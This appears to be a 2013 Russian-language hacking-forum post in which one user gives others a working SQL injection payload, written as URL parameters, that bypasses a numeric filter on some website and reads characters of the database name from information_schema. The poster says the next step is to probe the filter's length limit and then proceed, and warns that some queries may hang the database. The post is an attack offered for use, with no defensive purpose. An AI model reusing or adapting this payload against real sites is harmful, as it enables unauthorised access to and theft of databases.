13.12.2013, 07:20
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сбербанк, С count(*)сложнее, но данные можно выводить:
Код:
lan=3&pid=0%26((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(SELECT*FROM(SELECT*FROM information_schema.tables LIMIT 1)a1 WHERE @:=ascii(mid(TABLE_SCHEMA,1,1))))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать.
sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
|
|
|